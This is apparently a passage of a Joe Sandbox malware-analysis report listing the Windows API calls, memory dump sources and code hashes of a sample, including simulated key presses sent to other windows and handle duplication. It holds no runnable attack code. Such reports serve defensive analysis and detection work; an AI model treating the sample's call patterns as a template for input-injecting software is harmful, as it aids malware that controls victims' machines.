                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C543AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetCurrentThreadId.KERNEL32 ref: 00C543B4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C52F00), ref: 00C543BB
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C52F0A
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C52F28
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C52F2C
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C52F36
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C52F4E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C52F52
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C52F5C
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C52F70
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C52F74
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                            • Opcode ID: 699b701532a589799da580f0d49109b16f0834c55b60ea2b520f77a68209cf2c
                                                                                                                                                                                                                                                                            • Instruction ID: 09301d8e16f23b3922e29bc634bf51e6743f1f5fbc5e8bb76adddb162a8d15ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 699b701532a589799da580f0d49109b16f0834c55b60ea2b520f77a68209cf2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D501B5306842147BFB106B699C8EF5D3F59DF4EB12F100011F719AE1E4C9E164849BAD
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C51D95,?,?,00000000), ref: 00C52159
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00C51D95,?,?,00000000), ref: 00C52160
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51D95,?,?,00000000), ref: 00C52175
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00C51D95,?,?,00000000), ref: 00C5217D
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C51D95,?,?,00000000), ref: 00C52180
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51D95,?,?,00000000), ref: 00C52190
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00C51D95,00000000,?,00C51D95,?,?,00000000), ref: 00C52198
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C51D95,?,?,00000000), ref: 00C5219B
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00C521C1,00000000,00000000,00000000), ref: 00C521B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                            • Opcode ID: bc1967ca6a350d4981119ec3ab3996b9deff26f6e2582f574c7553bd0b323857
                                                                                                                                                                                                                                                                            • Instruction ID: 2d4870029922c93d6f12e80c7e667b9cd9944e51a15b4a1436bac4503e3abcd9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc1967ca6a350d4981119ec3ab3996b9deff26f6e2582f574c7553bd0b323857
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8201A8B5240304BFE610ABA5EC8DF6F7BACEB89711F004411FA05DB1E1CA709C04CB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C843C1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C843D6
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C843F0
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84435
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C84462
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C84490
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                            • Opcode ID: 6dab1739a877a4a31cc5006bad49575d0b66a8c9ec86d2201bb8460ee99d1119
                                                                                                                                                                                                                                                                            • Instruction ID: 8ed74177c2bdedd797f5c95bee3de87c310f2db90cda7a2e69a4358470cc82b6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dab1739a877a4a31cc5006bad49575d0b66a8c9ec86d2201bb8460ee99d1119
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5441D071900319ABDF25AFA4CC49FEE7BA9FF48364F100126F914E7291D7709980DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5C6C4
                                                                                                                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 00C5C6E4
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C5C71A
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(01586E98), ref: 00C5C76B
                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(01586E98,?,00000001,00000030), ref: 00C5C793
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                            • Opcode ID: a53a0c43a0c5ef5f87c9b36251778008edcc672243349be8162e4e1c16dfe425
                                                                                                                                                                                                                                                                            • Instruction ID: 405804139c5dabfd25be1fe1f7f656880241211f458cffb8f3a753cf67f91915
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a53a0c43a0c5ef5f87c9b36251778008edcc672243349be8162e4e1c16dfe425
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2651B2786003059FDF10CF68D8C4BAEBBF4AF58399F24415AEC2197691E7709A88CF59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00C5D1BE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                            • Opcode ID: 69cae5e87ed8efb722ba5b45a2fd2351e9553ff2c37622f92c7f4daf2e5634b5
                                                                                                                                                                                                                                                                            • Instruction ID: 70ca3b846d4663dfa13297ff2f20d4a943dc117bc90e05d8a00dbcf8e59f413d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69cae5e87ed8efb722ba5b45a2fd2351e9553ff2c37622f92c7f4daf2e5634b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B11E739248706BAEB156B55EC82DEF779CDF05771F20006AFD02B62C1DBB45BC45268
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                            • Opcode ID: ec18f4deb8630ee362f0347fb72202fead9000b2451b487006de4c2ac5208a1a
                                                                                                                                                                                                                                                                            • Instruction ID: cef7bbd347b598ee349839ed300cf0033ff8ca60825f1cf07bc97bb080496ff0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec18f4deb8630ee362f0347fb72202fead9000b2451b487006de4c2ac5208a1a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F411D2759001147BDB286B209C4AFEE77ACEF05712F1000A9F916E60D1EE748BC5E798
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                                                                                                                                                            • Opcode ID: e16f70af46f7840522027a6d2d2905870f23467099446f44c951072e027dd914
                                                                                                                                                                                                                                                                            • Instruction ID: ef652afd61ae9c2580eed28f5b2dfd812e2c1954860d37cc83422d8b4de3015c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e16f70af46f7840522027a6d2d2905870f23467099446f44c951072e027dd914
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6841D565C10114B5CB15EBB8CC86ACFB3ACAF06350F008426F519E3121FA34D2D6E7EA
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C0FC41
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C4FC15
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C4FC98
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ShowWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2c06a8d4380f188cb59c429fb7ed8348d1c96f12d4376c40515209633552a08d
                                                                                                                                                                                                                                                                            • Instruction ID: 281a3cdcb85e51f8f4e1d91260b453280deddaeb9f2836d2c0d1280dcbc820f6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c06a8d4380f188cb59c429fb7ed8348d1c96f12d4376c40515209633552a08d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A741F73160838C9AE7358B39C9CDB2E7F91BB46710F14453CE96746EE0C671AAC2D711
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C837B7
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C837BF
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C837CA
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C837D6
                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C83812
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C83823
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C86504,?,?,000000FF,00000000,?,000000FF,?), ref: 00C8385E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C8387D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                            • Opcode ID: ec988b551dcda1dd02bee353bdc21203212505f5cc8ded1bd63f742948ca4891
                                                                                                                                                                                                                                                                            • Instruction ID: 800b5c35682f74dd1a3c12abb4b542250f28b6d6a0ae0f85301a85ea316b11dc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec988b551dcda1dd02bee353bdc21203212505f5cc8ded1bd63f742948ca4891
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8531CE72200224BFEB118F50DC89FEB3BADEF09B25F040025FE099A2D1D6B59D41C7A8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                                                                                                                                                            • Opcode ID: a56ed5a8442028eb42e7d9cf863a047f7daab116f2d8bc209f1c2ada674ecfe5
                                                                                                                                                                                                                                                                            • Instruction ID: 33ffac5e265370d8bdae02ab4c8e4c55b1108fae53a620a772ee73e2bc65ac64
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a56ed5a8442028eb42e7d9cf863a047f7daab116f2d8bc209f1c2ada674ecfe5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2D1A075A0060A9FDF10CF68C885BAEB7B5FF48344F14C569E919AB281E7B0EE45CB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C3194E
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C319D1
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C31B7B,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31A64
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31A7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31AF7
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C31B22
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C31B2E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea5fbf245e0dadbf2d67bee135ae2279b64fedcf61856aa6e9bcc25bd670e4f0
                                                                                                                                                                                                                                                                            • Instruction ID: 5d21fd32287496ef7b570b630489301d0a5118d263ace5c6eb57d01985e7f2f1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea5fbf245e0dadbf2d67bee135ae2279b64fedcf61856aa6e9bcc25bd670e4f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E091C472E202569FDB208E65CC91BEEBBB59F09314F1C0569EC15E7280EB35DE41D760
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                            • API String ID: 2610073882-625585964
